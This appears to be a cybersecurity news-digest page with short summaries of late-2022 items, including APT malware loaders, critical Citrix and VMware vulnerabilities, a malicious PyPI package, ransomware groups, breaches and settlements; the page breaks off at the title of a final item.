    Titania has released an independent research report investigating the impact of exploitable misconfigurations on network security in the US federal government. According to the study, "The Impact of Exploitable Misconfigurations on the Security of Agency Networks and Current Approaches to Risk Mitigation in the US Federal Government," network professionals report that they are meeting their security and compliance practices, but data indicate that risk is still high. Therefore, according to the report's findings, it is likely to cost billions of dollars yearly. The research revealed that federal government respondents were the only sector representatives who stated that they assessed firewall configurations. Their network checks did not include switches or routers. As a result, the agencies are sampling the security of their network device fleets. According to zero trust best practice, continuous assessment of all devices is critical for preventing intrusion and inhibiting lateral movement across networks. Sampling is a risky approach to configuration security that exposes organizations to the risk of configuration drift bringing networks down. Furthermore, the survey found that the inability to prioritize risk (81 percent) and inaccurate automation (44 percent) are the top two challenges for federal government respondents in meeting their enterprise security and external compliance requirements. Federal respondents also revealed that financial resources dedicated to mitigating network configuration risks, which currently account for around 3.4 percent of the total IT budget, are a constraint in configuration management. This article continues to discuss Titania's findings regarding the impact of exploitable misconfigurations.

    Help Net Security reports "Security 'Sampling' Puts US Federal Agencies at Risk"

  • news

    Visible to the public "New Hacking Group Uses Custom 'Symatic' Cobalt Strike Loaders"

    'Earth Longzhi,' a previously unknown Chinese Advanced Persistent Threat (APT) hacking group, targets organizations in East Asia, Southeast Asia, and Ukraine. The threat actors have been active since at least 2020, planting persistent backdoors on victims' systems using customized versions of Cobalt Strike loaders. According to a new Trend Micro report, Earth Longzhi shares techniques, tactics, and procedures (TTPs) with 'Earth Baku,' both of which are considered subgroups of the state-backed hacking group APT41. The report by Trend Micro shows two Earth Longzhi campaigns, the first of which took place between May 2020 and February 2021. During that time, the hackers targeted several Taiwanese infrastructure companies, a Chinese bank, and a Taiwanese government organization. The hackers used the custom Cobalt Strike loader 'Symatic,' which has a sophisticated anti-detection system, in this campaign. It is capable of removing Application Programming Interface (API) hooks from 'ntdll.dll,' obtaining raw file content, and replacing the in-memory ntdll image with an unmonitored copy. To obfuscate the chain, it can also spawn a new process for process injection and masquerade the parent process. Furthermore, it has the ability to inject a decrypted payload into the newly created process. This article continues to discuss the new Earth Longzhi hacking group using custom Symatic Cobalt Strike loaders.

    Bleeping Computer reports "New Hacking Group Uses Custom 'Symatic' Cobalt Strike Loaders"

  • news

    Visible to the public "Patch ASAP: Critical Citrix, VMware Bugs Threaten Remote Workspaces With Takeover"

    Citrix and VMware products have critical authentication-bypass vulnerabilities, threatening devices running remote workspaces with a complete takeover, the vendors have warned. Citrix's CVE-2022-27510 critical bug, with a CVSS vulnerability-severity score of 9.8 out of 10, enables unauthenticated access to Citrix Gateway when the appliance is used as a Secure Sockets Layer (SSL) Virtual Private Network (VPN) solution. In that configuration, it provides access to internal company applications via the Internet from any device, and it provides Single Sign-On (SSO) across applications and devices. Therefore, a successful attacker could easily gain initial access, then burrow deeper into an organization's cloud footprint and wreak havoc across the network due to the flaw. This article continues to discuss the critical Citrix and VMware vulnerabilities threatening remote workspaces.

    Dark Reading reports "Patch ASAP: Critical Citrix, VMware Bugs Threaten Remote Workspaces With Takeover"

  • news

    Visible to the public "Researchers Uncover PyPI Package Hiding Malicious Code Behind Image File"

    A malicious package found on the Python Package Index (PyPI) was discovered using a steganographic trick to conceal malicious code within image files. According to researchers at Check Point, the package in question, named "apicolor," was uploaded to the Python third-party repository on October 31, 2022, and is described as a "Core lib for REST API." It has since been removed. Apicolor, like other recently discovered rogue packages, hides its malicious behavior in the setup script, which is used to specify metadata about the package, such as its dependencies. This takes the form of a second package called "judyb," as well as a seemingly innocuous PNG file called "8F4D2uF.png," which is hosted on Imgur, an image-sharing service. This article continues to discuss the discovery of a PyPI package hiding malicious code behind image files.

    THN reports "Researchers Uncover PyPI Package Hiding Malicious Code Behind Image File"

  • news

    Visible to the public "A 5G-Enabled AI-Based Malware Classification System for the Next Generation of Cybersecurity"

    The Industrial Internet of Things (IIoT) is increasingly gaining popularity due to its ability to create communication networks between various components of an industry and usher in the new Industry 4.0 revolution. IIoT, powered by wireless 5G connectivity and Artificial Intelligence (AI), can analyze critical problems and provide solutions to improve the operational performance of manufacturing, healthcare, and other industries. The Internet of Things (IoT) is highly user-centric because it connects TVs, voice assistants, refrigerators, and other devices, whereas IIoT is concerned with improving the health, safety, or efficiency of larger systems, bridging hardware and software, and performing data analysis to provide real-time insights. While IIoT has many benefits, it also has some drawbacks, such as security threats in the form of attacks attempting to disrupt the network or extract resources. As IIoT becomes more prevalent in industries, it is critical to develop an efficient system to address such security concerns. A multinational team of researchers led by Professor Gwanggil Jeon at Incheon National University wanted to address this challenge. They explored the world of 5G-enabled IIoT to investigate its threats and devise a novel solution. The team presented an AI- and deep learning-based malware detection system for 5G-assisted IIoT systems in a recent review published in IEEE Transactions on Industrial Informatics. According to Professor Jeon, security threats can lead to operational or deployment failure in IIoT systems, resulting in high-risk situations. Therefore, they decided to investigate and compare existing research, identify gaps, and propose a new design for a security system capable of detecting and classifying malware attacks in IIoT systems. The team's system analyzes malware using a method called grayscale image visualization with a deep learning network. It then uses a multi-level Convolutional Neural Network (CNN) architecture to categorize the malware attack into different types. This security system is also integrated with 5G to enable low latency and high throughput sharing of real-time data and diagnostics. When compared to traditional system architectures, the new design achieved 97 percent accuracy on the benchmark data set. This article continues to discuss the research and development behind the new 5G-enabled AI-based malware classification system.

    Nanowerk News reports "A 5G-Enabled AI-Based Malware Classification System for the Next Generation of Cybersecurity"

  • news

    Visible to the public "Researchers Improve Security for Smart Systems"

    Sensors collect and share large amounts of data to help decision-makers in an increasingly connected and smart world. Through these sensors, people receive ever-increasing amounts of data in ways that can be difficult to decipher. A group of researchers at Washington State University developed a method for statistically analyzing such complex sensor data, allowing computer algorithms that make data-based decisions to be more resilient and capable of dealing with minor errors. The research has many applications, including mobile health, smart homes, the electric power grid, and agriculture. The work, led by Jana Doppa, Huie-Rogers Endowed Chair Associate Professor of Computer Science, is said to be a significant and novel contribution to the security of Machine Learning (ML) systems. ML algorithms are increasingly being used in various applications, such as smart grid management and smart agriculture. For example, they could be used to collect data from sensors in farm fields and weather instruments to learn and predict optimal watering times. Many smart applications collect data in the form of a time series, which is a data set that tracks a sample over time and provides a series of timestamp data points. Although computers collect data and generate time series lines and charts, people are not well suited to read and comprehend them. In addition, they may overlook minor but significant changes, even those that are done maliciously. As more systems incorporate ML, the security of those systems has been an understudied issue, according to Doppa. Adversarial attacks can occur when an attacker gains access to smart sensors and then causes small perturbations in the data that are undetectable to an observer. The perturbations can cause the prediction and decision-making processes to fail. The WSU researchers added a security layer to their ML algorithm to detect potential disturbances and determine how statistically likely they are to occur, providing system resilience and preventing major failures. This article continues to discuss the WSU researchers' work to improve the security of smart systems.

    WSU reports "Researchers Improve Security for Smart Systems"

  • news

    Visible to the public "George Mason University Hackathon Winners Unveil Solutions to Fight Global Counterfeiting"

    The winners of the 2022 Bring Down Counterfeiting Public Policy Hackathon, held November 5 at the Homeland Security Investigations Innovation Lab in Arlington, were announced by George Mason University's Terrorism, Transnational Crime and Corruption Center (TraCCC). The event in which US and international academic institutions, companies, and other affiliations participated, presented the challenge of developing innovative ideas to improve public-private collaborations in the face of the industry-wide global challenge of counterfeiting. For over two decades, the National Intellectual Property Rights Coordination Center (IPR Center), in collaboration with industry and brand owners, has led the effort in the government's Intellectual Property (IP) theft prevention response and has played a significant role in policing the sale and distribution of counterfeit goods on websites, social media, and eCommerce marketplaces. One of 11 teams in the final, Team Hypercube, won the $20,000 first prize for its concept of a national counterfeiting index via an Artificial Intelligence (AI)-powered blockchain that would allow federal, state, and local law enforcement to share information as well as consumers to verify the authenticity of a product through their phones. Team Nimbus took second place and $15,000 for proposing the development of a Chrome extension that can prevent the consumption of counterfeit medicine by focusing on counterfeit pharmacies. A-Capp Team #1 proposed creating a central database to help law enforcement and private businesses track individuals and factories that manufacture or sell counterfeit items. The Spartan Solution won the $5,000 student prize for demonstrating a cipher-based solution to combat counterfeit listings on eCommerce sites before they reach consumers. The $2,000 crowd source prize went to Team G.I.N., which detailed the creation of a network accessible via QR code that will allow everyone to differentiate between genuine and counterfeit goods. The submissions were scored by an expert panel of judges based on their potential impact, scalability, creativity, and design. This article continues to discuss the winning proposed solutions of the 2022 Bring Down Counterfeiting Public Policy Hackathon.

    ICE reports "George Mason University Hackathon Winners Unveil Solutions to Fight Global Counterfeiting"

  • news

    Visible to the public "Insider Risk on the Rise: 12% of Employees Take IP When Leaving Jobs"

    Security researchers Dtex conducted a study on the top insider risk trends for 2022 and discovered that twelve percent of all employees take sensitive intellectual property (IP) with them when they leave an organization. Some of the IP taken from organizations include customer data, employee data, health records, sales contacts, and more. The researchers noted that more and more applications are providing new features that make data exfiltration easier. The security researchers also saw a 55% increase in unsanctioned application usage, including those making data exfiltration easier by allowing users to maintain clipboard history and sync IP across multiple devices. The researchers noted that Bring Your Own Applications (BYOA) or Shadow IT can be a source of intelligence for business innovation, but they pose a significant risk if the security team has not tested these tools thoroughly. The researchers also discovered a 20% increase in resignation letter research and creation from employees taking advantage of the tight labor market to switch positions for higher wages. The researchers also witnessed a 200% increase in unsanctioned third-party work on corporate devices from a high prevalence of employees engaged in side gigs.

    Infosecurity reports: "Insider Risk on the Rise: 12% of Employees Take IP When Leaving Jobs"

  • news

    Visible to the public "'Justice Blade' Hackers Are Targeting Saudi Arabia"

    The 'Justice Blade' threat actor group published leaked data from Smart Link BPO Solutions, an outsourcing Information Technology (IT) vendor that works with major enterprises and government agencies in Saudi Arabia and other Gulf Cooperation Council (GCC) countries. The malicious actors claim to have stolen a large amount of data, including Customer Relationship Management (CRM) records, personal information, emails, contracts, and account credentials. Justice Blade also set up a Telegram account with a private communication channel. Based on the attackers' screenshots and video, the incident could have occurred as a result of a targeted network intrusion impacting Active Directory (AD) as well as internal applications and services. They also released screenshots of active Remote Desktop Protocol (RDP) sessions and Office 365 communications between various companies in the region, along with several lists of users containing over 100,000 records likely related to FlyNas (airline company) and SAMACares (initiative managed by Saudi Arabia Central Bank). According to Resecurity, Inc., which protects major Fortune 500 companies, the data breach could be one of the region's first significant supply chain cybersecurity incidents due to an overlap between an enterprise and the government sector. Threat actors could use the stolen data to target other companies and individuals of interest. Multiple leaked credentials belonging to Smart Link BPO Solutions have previously been identified in the dark web and various underground marketplaces in the TOR network, which could be used by the Justice Blade group to conduct successful cyberattacks. The information currently available shows that the announcement of the attack began with the defacement of a corporate website around November 2 and progressed as a "hack-and-leak" operation. Before that, on October 30, the victim company presumably detected Metasploit Framework activity, which was deployed by the bad actors post-compromise. According to leaked company communications, the compromised account of an employee was most likely used to carry out the attack. There is no evidence that the attack was financially motivated since there have been no ransom demands registered. This article continues to discuss the Justice Blade group publishing leaked data from Smart Link BPO Solutions.

    Security Affairs reports "'Justice Blade' Hackers Are Targeting Saudi Arabia"

  • news

    Visible to the public "CISA, NSA and Industry Outline Security Responsibilities of Software Suppliers"

    According to guidance recently released by the National Security Agency (NSA) and the US Homeland Security Department's Cybersecurity and Infrastructure Security Agency (CISA), software suppliers have unique responsibilities to maintain the efficient delivery of their products while having to consider security risks. The NSA noted that prevention is often considered the software developer's responsibility. The software developer is required to develop and deliver code securely, verify third-party components, and harden the build environment. However, the NSA points out that the supplier has a critical role in ensuring the security and integrity of software since the software vendor is responsible for communicating between the customer and the software developer. Through this relationship, additional security features are implemented through contractual agreements, software releases and updates, vulnerability notifications, and mitigations. The document created for software vendors is the first in a series of three. The Enduring Security Framework (ESF), which includes US government officials and industry representatives from the Information Technology (IT), communications, and defense sectors, released developer guidance in September and plans to address software consumers' security responsibilities next. Security best practices for software producers and users have already been articulated in the National Institute of Standards and Technology (NIST) Secure Software Development Framework, which NIST used to meet its obligations under Executive Order 14028 to provide guidance to federal agencies. In May 2021, President Joe Biden issued the order in response to the SolarWinds incident, in which customers of the ubiquitous IT management firm were compromised after installing what appeared to be a routine update. The hackers gained unauthorized access to SolarWinds' delivery mechanism and disguised their malware as new code. According to the document, this series will help foster communication between these three different roles and among cybersecurity professionals, which may facilitate increased resiliency and security in the software supply chain process. This article continues to discuss the new guidance that tries to distinguish between the security duties of software developers, suppliers, and consumers.

    NextGov reports "CISA, NSA and Industry Outline Security Responsibilities of Software Suppliers"

  • news

    Visible to the public "Over Thirty Arkansas Counties Impacted by Cyberattack"

    A cyberattack over the weekend is causing county offices across the state of Arkansas to go offline or temporarily close. Each affected county is using the company Apprentice Information Systems (AIS) for its online servers. The Rodgers based business would not say how many counties they serve, but several affected county offices said they believe it could easily be up to half the state. By calling 20 central Arkansas counties before they closed Monday and searching the Assessor's Apprentice Information Systems User Group website, it was found that three counties (Garland, Hot Springs, Jefferson) used a different provider and were unaffected. Three counties (Arkansas, Pike, and Van Buren) were without internet. Overall, 31 counties are confirmed to have at least one or more offices serviced by AIS with servers offline. A spokesperson at Apprentice Information Systems stated that depending on location, it is stopping or limiting several services. The company noted that users "cannot assess, pay taxes, file deeds, search for deeds, obtain marriage licenses., etc." The company is currently investigating the incident. reports: "Over Thirty Arkansas Counties Impacted by Cyberattack"

  • news

    Visible to the public "Iranian Actors Targeting Healthcare via Spear-Phishing, Vulnerability Exploit"

    The US Department of Health and Human Services' Cybersecurity Coordination Center (HC3) issued a warning about the threat posed by Iranian nation-state actors to the healthcare sector. In June 2021, the FBI foiled an Iranian-backed cyberattack on Boston Children's Hospital. The white paper describes the groups, with a particular emphasis on the healthcare sector, as well as critical mitigating factors and common exploits. Provider entities are encouraged to review the insights to ensure that the necessary security measures are in place. Iran and North Korea continue to conduct sophisticated intrusions against US targets. The HC3 report, fueled by previous efforts, notes that Iranian threat actors are historically risk-averse and notorious for wiper malware as well as retaliatory attack strategies. These actors frequently conduct spear phishing, Distributed Denial-of-Service (DDoS) attacks, sensitive data theft, website defacement, and social media-driven operations. Furthermore, these organizations have signed cybersecurity and information technology agreements with both Russia and China, expanding their cyber capabilities and potential impacts. The healthcare sector and medical researchers are heavily targeted by four groups, with spear phishing being the most common initial intrusion vector. One group often uses healthcare-related lures, as well as job postings, password policies, or resumes. HC3 is the most concerned about these groups' ability to use fake personas that realistically mimic legitimate entities, including believable CC'd email addresses that make users difficult to detect. The use of email as a pivot point is a common tactic in healthcare, but it is also one of the most difficult defense challenges. Providers should use the HC3 white paper to assess the current state of their email program by reviewing current processes. For providers to review, the insights detail the three phases of an attack as well as the aftermath. The report also includes a list of commonly exploited vulnerabilities that should be patched or segmented from the network right away. This article continues to discuss the threat of Iranian nation-state actors faced by the healthcare sector.

    SC Magazine reports "Iranian Actors Targeting Healthcare via Spear-Phishing, Vulnerability Exploit"

  • news

    Visible to the public "Conti Affiliates Black Basta, BlackByte Continue to Attack Critical Infrastructure"

    Security researchers at the threat response unit (TRU) at eSentire have found that between the end of February and mid-July 2022, 81 victim organizations were listed on the BlackByte and Black Basta data leak sites. Of those, 41% were based in Europe, and many are part of critical infrastructure sectors, including energy, government, transportation, pharmaceuticals, facilities, food, and education. The researchers noted that the remaining 59% were primarily located in the US and included several victims, including a manufacturer of agricultural machinery, a small regional grocery chain, and several construction firms. The researchers stated that what stands out is that the US companies that were attacked by these two ransomware gangs during this time frame, for the most part, are not part of critical infrastructure sectors. However, the European-based victim organizations are definitely in critical infrastructure segments, including transportation, energy, government facilities, pharmaceuticals, food, and education. The researchers stated that the Conti ransomware group appeared to shut down in May 2022, but it actually did not shut down and instead moved its operation into other ransomware brands, including Black Basta and BlackByte. The researchers stated that originally Conti ransomware group, which is known to have Russian-state affiliations tended to target critical infrastructure in western, NATO-aligned countries, especially the US. However, the researchers added that in the summer of 2021, US President Joe Biden began applying pressure on Russian President Vladimir Putin, threatening sanctions and retaliation. The researchers noted to avoid lost ransomware payments via sanctions and targeting by international law enforcement, Russian-based ransomware groups, especially Conti affiliates Black Basta and BlackByte, began rotating away from US targets towards other NATO-affiliated countries in Europe.

    Infosecurity reports: "Conti Affiliates Black Basta, BlackByte Continue to Attack Critical Infrastructure"

  • news

    Visible to the public "Raspberry Worm Exposes Larger, More Complex Malware Ecosystem"

    Raspberry Robin has quickly evolved from a worm that, while widely distributed, did not show any post-infection actions to an active malware distribution platform, just a few months after its discovery by Red Canary researchers in May 2022. Microsoft has discovered new evidence that the Raspberry Robin worm is a part of a complex and interconnected malware ecosystem, consisting of links to other malware families and alternate infection methods beyond its original spread via USB drives. Following these infections, hands-on-keyboard attacks and human-operated ransomware activity occur. Continuous monitoring of Raspberry Robin-related activity reveals an active operation, with nearly 3,000 devices in nearly 1,000 organizations receiving at least one Raspberry Robin payload-related alert in the last 30 days. The researchers found that Raspberry Robin-infected devices were being installed with FakeUpdates malware, leading to activity by DEV-0243, a ransomware-associated activity group that overlaps with the actions of EvilCorp. Raspberry Robin has begun deploying IcedID, Bumblebee, and Truebot. By October, the researchers had discovered Raspberry Robin being used in post-compromise activity linked to another actor, DEV-0950, which overlapped with groups publicly tracked as FIN11/TA505. The DEV-0950 activity resulted in Cobalt Strike hands-on-keyboard compromises after a Raspberry Robin infection, sometimes with a Truebot infection seen in between the Raspberry Robin and Cobalt Strike stages. Clop ransomware was then deployed, signaling a significant shift away from phishing and toward using Raspberry Robin to deliver payloads to existing infections. Since the cybercriminal economy is so intertwined, Microsoft speculated that the actors behind the Raspberry Robin-related malware campaign, which is typically distributed via other means such as malicious ads or email, could be paying the Raspberry Robin operators for malware installs. This article continues to discuss the exposure of a more complex malware ecosystem by the Raspberry Robin worm.

    Security Boulevard reports "Raspberry Worm Exposes Larger, More Complex Malware Ecosystem"

  • news

    Visible to the public "Censinet, AHA, KLAS Partner On Healthcare Cybersecurity Benchmarking Study"

    Censinet, a healthcare risk management solutions provider, has announced plans to conduct "The Healthcare Cybersecurity Benchmarking Study" with the American Hospital Association (AHA) and KLAS Research. The study is enrolling hospital and health system participants, with the goal of evaluating key operational cyber metrics and cyber maturity as well as National Institute of Standards and Technology Cybersecurity Framework (NIST CSF) and Health Industry Cybersecurity Practices (HICP) coverage. The anonymized and aggregated data sets will provide benchmarking data and insight into key cybersecurity metrics across the sector to participating healthcare organizations. With cyber risk now posing a significant enterprise risk to hospitals and health systems, now is the time to strengthen the industry's cyber strength, maturity, and resilience, according to John Riggi, the AHA's national advisor for cybersecurity and risk. The Healthcare Cybersecurity Benchmarking Study gathers experts to achieve this goal and help all providers in reducing enterprise risk and protecting patient safety. Participants will also have access to Censinet's NIST CSF and HICP benchmarking muddles until March 2023, as well as guidance to address critical security gaps and specific benchmarks that organizations can use for resource allocation. Several health system sponsors, including Mass General Brigham, Intermountain Healthcare, Cedars-Sinai, Baptist Health, Dayton Children's, Fairview Health Services, Hartford HealthCare, and Marshfield Clinic Health System, are leading efforts to promote the study. According to Censinet CEO and founder Ed Gaudet, the Healthcare Cybersecurity Benchmarking Study is the first healthcare benchmarking initiative to combine key organizational indicators, NIST CSF, and HICP in support of comprehensive provider self-evaluation and peer comparison. This article continues to discuss the goals of the Healthcare Cybersecurity Benchmarking Study.

    HealthITSecurity reports "Censinet, AHA, KLAS Partner On Healthcare Cybersecurity Benchmarking Study"

  • news

    Visible to the public "ICS Patch Tuesday: Siemens Addresses Critical Vulnerabilities"

    Siemens and Schneider Electric have recently released their Patch Tuesday advisories for November 2022. Siemens has released nine new security advisories covering a total of 30 vulnerabilities, but Schneider has only published one new advisory. Of Siemens' nine advisories, three describe vulnerabilities that have been rated "critical." Four vulnerabilities, one high severity, and three critical flaws have been found in Sicam Q100 power meter devices. Siemens noted that the vulnerabilities can allow an attacker to hijack user sessions, crash the device, or execute arbitrary code. Another Siemens advisory noted that Scalance W1750D devices have more than a dozen vulnerabilities, including many rated "critical" that could allow an attacker to execute arbitrary code or cause a denial-of-service (DoS) condition. Patches are not available, but the vendor has provided some mitigations. The last Siemens advisory addressing a critical vulnerability describes a weak key protection issue in Sinumerik products. This issue was addressed last month in Simatic products. In another Siemens advisory, it was noted that high-severity vulnerabilities had been patched in Teamcenter Visualization and JT2Go products (DoS and remote code execution), Parasolid (remote code execution), and QMS Automotive (credentials exposure). It was also noted that Medium-severity flaws had been found in Ruggedcom ROS devices, industrial controllers, and the Sinec network management system. Schneider Electric only published one new advisory. It covers three vulnerabilities that expose its NetBotz security and environmental monitors to cross-site scripting (XSS), account takeover, and clickjacking attacks. The French industrial giant has released patches.

    SecurityWeek reports: "ICS Patch Tuesday: Siemens Addresses Critical Vulnerabilities"

  • news

    Visible to the public "APIs Are Everywhere, but API Security Is Lacking"

    As the number of Application Programming Interfaces (APIs) spreads across corporate infrastructure, they are quickly becoming the largest attack surface in applications and a major target for attackers. According to industry experts, the rise of increasingly integrated web and mobile-based offerings requiring data sharing across multiple companies' products, as well as the dependence of mobile apps on APIs, has fueled growth and made API security one of the most difficult challenges for CIOs. A 2022 survey conducted by 451 Research revealed that 41 percent of respondent organizations experienced an API security incident in the last 12 months. Sixty-three percent of the respondent organizations said the incident involved a data breach or data loss. API security products were generally developed before API use expanded to the level today, and were based on the idea that requiring developers to secure the code they write invites failure, according to a GigaOm research report. GigaOm also noted that developers do not intentionally write insecure code, so if they inadvertently write code with vulnerabilities, it is most likely because they are unaware of the vulnerabilities that an API may have. However, once API security was implemented, Information Technology (IT) quickly discovered a new reason to use a security product, which is that some vulnerabilities are far easier to block in the network than in each and every application. According to the GigaOm report, the idea that it is more effective to block some attacks in the network, which includes data centers, cloud vendors, and Software-as-a-Service (SaaS) providers, has fueled demand for products capable of doing this. APIs make up 91 percent of all web traffic, and they are consistent with the trend toward microservice architectures and the need to respond dynamically to rapidly changing market conditions. Yet, APIs have given rise to a completely new class of cybersecurity threats that specifically target them as a primary attack vector. The volume and severity of Web API traffic and attacks are increasing. More than half of APIs are invisible to business IT and security teams. These unknown, unmanaged, and unsecured APIs are exposing critical business logic vulnerabilities and increasing risk to organizations. This article continues to discuss the need to bolster API security.

    VB reports "APIs Are Everywhere, but API Security Is Lacking"

  • news

    Visible to the public "Google Patches High-Severity Privilege Escalation Vulnerabilities in Android"

    Android's November 2022 security updates patch over 40 vulnerabilities, including multiple high-severity escalation of privilege bugs. The first part of the update includes fixes for 17 security defects, 12 of which could lead to escalation of privilege (EoP), three to denial of service (DoS), and two to information disclosure. All of these are high-severity vulnerabilities impacting Android 10 and newer releases. Google noted that except for one bug, all of them impact Android 13 as well. Google stated that the most severe of these issues is a vulnerability in the Framework component that could lead to local escalation of privilege with no additional execution privileges needed. Google also mentions two additional vulnerabilities addressed as part of the Google Play system updates, namely CVE-2022-2209 (impacting Media framework components) and CVE-2022-20463 (impacting Wi-Fi). The second part of this month's Android security update resolves 26 additional issues (one critical and 25 high-severity flaws) in Imagination Technologies, MediaTek, Unisoc, and Qualcomm components. Google noted that Android devices running a security patch level of 2022-11-05 or later have been patched against all these vulnerabilities. Google stated that an additional set of five issues were resolved with the November 2022 Pixel security updates. These include two high-severity bugs in the Titan M chip and three medium-severity flaws in Qualcomm closed-source components.

    SecurityWeek reports: "Google Patches High-Severity Privilege Escalation Vulnerabilities in Android"

  • news

    Visible to the public "ThriveDX Partners with the University of Chicago to Offer Cybersecurity Bootcamps"

    ThriveDX, the global leader in cybersecurity and digital skills training and cyber talent development, has announced a new partnership with the University of Chicago to provide cybersecurity bootcamp training to the Chicago area. The 400-hour training program will provide program participants with the essential skills and real-world experience needed to pursue a career in cybersecurity. ThriveDX collaborates with academic institutions, businesses, and governments around the world to provide advanced professional development programs in cybersecurity and digital technology. The University of Chicago's Cybersecurity Bootcamp powered by ThriveDX, is intended to meet the growing demand for cybersecurity professionals in the greater Chicago area. This collaboration will give learners in the Chicago region access to accelerated learning opportunities for those looking to transition into the cybersecurity and digital skills workforce. According to a recent Fortinet cybersecurity skills gap study, 80 percent of organizations worldwide experienced one or more breaches that could be attributed to a lack of cybersecurity skills or awareness. Furthermore, the survey revealed that a key factor contributing to this is that organizations struggle to find and retain certified cybersecurity talent. A lack of qualified cybersecurity candidates creates additional risks for their organizations. Learners will be introduced to a comprehensive curriculum detailing cybersecurity fundamentals through virtual, instructor-led lessons as well as experiential, hands-on learning throughout the program, divided into introductory and extended courses. By the end of the introductory course, students will have a thorough understanding of what the extended cybersecurity program covers, allowing them to determine whether the extended program is a good fit for their career goals. The extended program's courses are divided into three sections: Cybersecurity Fundamentals, Cybersecurity Infrastructure, and Advanced Cybersecurity. The proprietary experiential learning platform called TDX Arena is an online learning platform where learners complete simulations of real-world hacking scenarios, and it is one of the unique aspects of the cybersecurity program. This article continues to discuss the partnership between ThriveDX and the University of Chicago to offer cybersecurity bootcamps and the cybersecurity workforce gap.

    GlobeNewswire reports "ThriveDX Partners with the University of Chicago to Offer Cybersecurity Bootcamps"

  • news

    Visible to the public "US States Announce $16M Settlement With Experian, T-Mobile Over Data Breaches"

    Recently, authorities in 40 US states have reached a settlement totaling more than $16 million with Experian and T-Mobile over data breaches suffered by the companies in 2012 and 2015. The multi-state settlement with Experian totals more than $13.67 million, and the settlement with T-Mobile is for $2.5 million. In addition, each company has agreed to take steps to improve their data security practices. The attorneys general in several states published press releases announcing how much they will each receive from these settlements. Hawaii, for instance, is getting roughly $180,000, Massachusetts will receive over $625,000, New Jersey $500,000, Pennsylvania $460,000, Michigan $360,000, and Nebraska will get $140,000. The settlement is related to two cybersecurity incidents. As part of the settlement, Experian will need to implement a comprehensive information security program and take other steps to prevent such incidents from occurring in the future. Experian will also be required to offer impacted consumers five years of free credit monitoring services. As for T-Mobile, the company must strengthen third-party oversight to ensure that vendors handling its customers' data can protect the sensitive information they are entrusted with.

    SecurityWeek reports: "US States Announce $16M Settlement With Experian, T-Mobile Over Data Breaches"

  • news

    Visible to the public "COLUMN: Test and Verify That Cybersecurity Products Can Protect Critical Infrastructure"

    Vergle Gipson, Senior Advisor for the Idaho National Laboratory's (INL) Cybercore Integration Center, recently testified before the House Homeland Security Subcommittee on Cybersecurity, Infrastructure Protection, and Innovation. He concluded that Operational Technology (OT) systems in the US are more vulnerable to malicious cyberattacks than Information Technology (IT), which is concerning given that much of the world's critical infrastructure has been the target of cyberattacks. On a global scale, there have been many attempted cyberattacks on grids and utilities, many of which have been successful, using phishing and ransomware. Cyberattacks on critical infrastructure is cited as a top concern in the World Economic Forum's Global Risks Report. Attacks on critical infrastructure have become the new normal in sectors such as energy, healthcare, and transportation, according to the World Economic Forum. Among critical infrastructures, the energy sector stands out as particularly vulnerable. Power plants, utilities, nuclear plants, and the grid are all part of the energy ecosystem. It is a difficult task to protect critical Industrial Control Systems (ICS), OT, and IT systems from cybersecurity threats as each have its own operational frameworks, access points, and a mix of legacy and emerging technologies. Hardware-implemented cybersecurity is required in critical infrastructure OT to ensure safety in the face of an ever-increasing threat landscape. Penetration testing is the best way to determine if OT is secure. The Israel Electric Corporation (IEC), Israel's largest supplier of electrical power, recently began penetration testing on potential vendors to determine how well they are protected from breaches. IEC cannot afford to deploy security technologies that fail to meet mission specifications because it builds, maintains, and operates power generation stations, substations, and transmission and distribution networks. This is especially important given that Israel's critical infrastructure is constantly under attack, and hardware product vulnerabilities now attached to critical infrastructure could present a major threat if discovered and exploited by adversaries. This article continues to discuss the threat of cyberattacks to critical infrastructure and the mitigation of hardware risk through comprehensive penetration testing.

    HSToday reports "COLUMN: Test and Verify That Cybersecurity Products Can Protect Critical Infrastructure"

  • news

    Visible to the public "Cyberattack Causes Disruptions at Canadian Meat Giant Maple Leaf Foods"

    Canadian meat giant Maple Leaf Foods has recently confirmed that it is experiencing an outage after falling victim to a cyberattack. Maple Leaf Foods has more than 14,000 employees and has a market presence in Canada, the US, and Asia, offering products under several brands, including Maple Leaf, Schneiders, Mina, Greenfield Natural Meat Co., Lightlife, and Field Roast. Over the weekend, the company fell victim to a cyberattack that resulted in system disruptions. The company noted that upon learning of the incident, they took immediate action and engaged cybersecurity and recovery experts. The company said that it has executed business continuity plans and that work is underway to restore the impacted systems. However, the company expects further operational and service disruptions, saying that restoration efforts take time. The company has not provided specific details on the cyberattack, but the outage and the prolonged restoration efforts could mean the company was the victim of a ransomware attack.

    SecurityWeek reports: "Cyberattack Causes Disruptions at Canadian Meat Giant Maple Leaf Foods"

  • news

    Visible to the public "DOJ Says It Seized Billions in Bitcoin Stolen by Hacker From Silk Road Darknet Marketplace"

    The US Department of Justice (DOJ) searched the home of James Zhong, a hacker who pleaded guilty to charges related to incidents involving the now-defunct Silk Road darknet marketplace. This was the largest cryptocurrency seizure in the DOJ's history. According to the DOJ and the Internal Revenue Service (IRS), the 32-year-old committed wire fraud in September 2012, stealing more than 50,000 Bitcoin from Silk Road. The stolen funds were seized in November 2021 during a raid on Zhong's Gainesville, Georgia home. The US Attorney Damian Williams said the whereabouts of this massive chunk of missing Bitcoin had ballooned into a $3.3 billion mystery for nearly ten years. Law enforcement was able to locate and recover this cache of crime proceeds because of the use of cutting-edge cryptocurrency tracing and old-fashioned police work. Court documents reveal that Zhong stole the funds by finding a way to get around Silk Road's processes. From 2011 to 2013, the marketplace was used to trade illegal goods worldwide. Ross Ulbricht, the platform's founder, was sentenced to life in prison in 2015. While the marketplace was open, Zhong set up nine accounts and executed more than 140 transactions in quick succession to trick Silk Road's withdrawal-processing system into releasing funds from its Bitcoin-based payment system. In order to conceal his identity, he transferred the Bitcoin into several different accounts. Zhong never used the platform to list or buy anything illegal, instead only funding the fraudulent accounts with initial deposits ranging from 200 to 2,000 Bitcoin. This article continues to discuss the DOJ's seizure of cryptocurrency stolen by a hacker from the now-defunct Silk Road darknet marketplace.

    The Record reports "DOJ Says It Seized Billions in Bitcoin Stolen by Hacker From Silk Road Darknet Marketplace"

  • news

    Visible to the public "New Laplas Clipper Malware Targeting Cryptocurrency Users via SmokeLoader"

